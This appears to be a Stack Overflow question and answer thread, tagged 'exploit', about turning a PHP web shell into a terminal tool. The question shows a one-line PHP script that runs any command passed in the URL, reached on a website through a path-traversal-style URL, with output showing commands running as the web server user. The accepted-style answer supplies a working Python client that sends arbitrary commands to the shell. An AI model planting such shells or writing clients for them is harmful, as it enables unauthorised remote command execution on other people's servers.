# passing an argument as a command in python

Tags: python, exploit

I created a php file that allow me to execute commands in the url. the php file and the url in the following quotes:

```
<?php

system($_GET['cmd']);

?>
```

the url is:

```
www.somewebsite.com/..././command.php?cmd=id
```

so here I used the command "id" and the output was:

```
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Now, I want to write a python script that pass the command I want as an argument and return the output in the terminal instead of executing the command in the browser.

This is my code so far:

```
import sys
import requests
import re
import webbrowser


url = 'http://localhost/.././command.php?cmd='

def remote():
   webbrowser.open('url')




def main():


   remote()
```

My problem is how to pass an argument as a command? like: python do.py id

Thanks in advance.

Comment: You should learn some basic Python first. Hint: use the `sys` module.

Comment: Bigger hint: https://stackoverflow.com/questions/4117530/sys-argv1-meaning-in-script

Comment: A good StackOverflow question would be focused on the specific thing you don't know how to do. For instance, trying to figure out how to retrieve a piece of data from the command line into a variable, or figuring out how to substitute a variable into a string. That said, it's overwhelmingly likely that there *already will exist* an answered question covering any such components -- so you should be able to figure out everything you need to do by breaking down your problem into smaller pieces, and searching StackOverflow (and/or the Python docs) for help with those individual pieces.

Comment: BTW, `webbrowser` is overkill here -- there's no reason to get a browser involved when all you need is a HTTP request, and you *don't* need a JavaScript engine and all that mess behind it. Indeed, you're opening yourself up to someone trying to fingerprint you or take advantage of other vulnerabilities in the broad attack surface a browser offers.

Answer (score 0):

You are probably looking for this:

```
import requests
import sys

url = 'http://localhost/.././command.php?cmd='
command = str(sys.argv[1])

response = requests.get(url + command)
print response.content
```

> You might need to install the [requests](http://docs.python-requests.org/en/master/user/install/) module. You can do that easily using pip.

Comment: That works, but I want the command to be passed in the command line instead of changing the variable "command" each time I want to execute different command!

Comment: Edited please verify

Comment: Have you considered using `sys.argv[]` ?
`sys.argv[0]` : script name
`sys.argv[1]` : the first parameter passed to your script

Comment: Accept the answer can you please? Thanks.

Comment: I used sys.argv[1:] because the first element is the script name and from [1:] is the command. however I got an error: TypeError: cannot concatenate 'str' and 'list' objects

Comment: I solved it. I had to use str function with the sys.argv. Thanks